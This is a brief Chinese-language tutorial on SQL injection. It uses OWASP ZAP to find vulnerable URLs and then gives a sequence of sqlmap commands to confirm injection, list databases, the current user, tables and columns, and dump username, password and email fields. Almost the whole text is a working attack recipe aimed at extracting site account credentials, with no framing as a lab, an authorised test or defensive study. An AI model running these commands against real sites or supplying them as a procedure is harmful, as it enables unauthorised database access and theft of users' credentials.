利用OWASP ZAP 安全掃描工具掃描可能存在注入的url
判斷注入點:sqlmap.py -u “存在注入url”
爆出所有數據庫名字:sqlmap.py -u “存在注入url” --dbs
查看當前使用賬號:sqlmap.py -u “存在注入url” --current-user
//打**的是關鍵看我下面的四步走
1、**查看當前數據庫:sqlmap.py -u “存在注入url” --current-db
2、**列出數據庫中所有表:sqlmap.py -u “存在注入url” --tables,除了這樣也可以這樣整,如下所示:sqlmap.py -u “存在注入url” -D “當前數據庫名” --tables //解釋說明:-D是指定數據庫名稱。
3、**-T是指定列要出字段的表,就是數據庫中的表名。
列出數據庫中的表中的字段:sqlmap.py -u “存在注入url” -D “當前數據庫名” -T “數據庫中的隨意一張表(選取表需要自己判斷)” --columns。
4、**跑出來表中的字段然后暴力拆解賬號和密碼,一般字段賬號密碼都是user/pass/password/username/keyword這些等等,自己找敏感的字段然后進行拆解。
-C指定要暴力拆解的字段
暴力拆解賬號密碼:sqlmap.py -u “存在注入url ” -D “當前數據庫名” -T “數據庫中的隨意一張表(選取表需要自己判斷)” -C “username,password,email(columns(字段)中疑似網站賬號密碼郵箱等敏感字段,舉例子說明)” --dump
--dump將結果導出。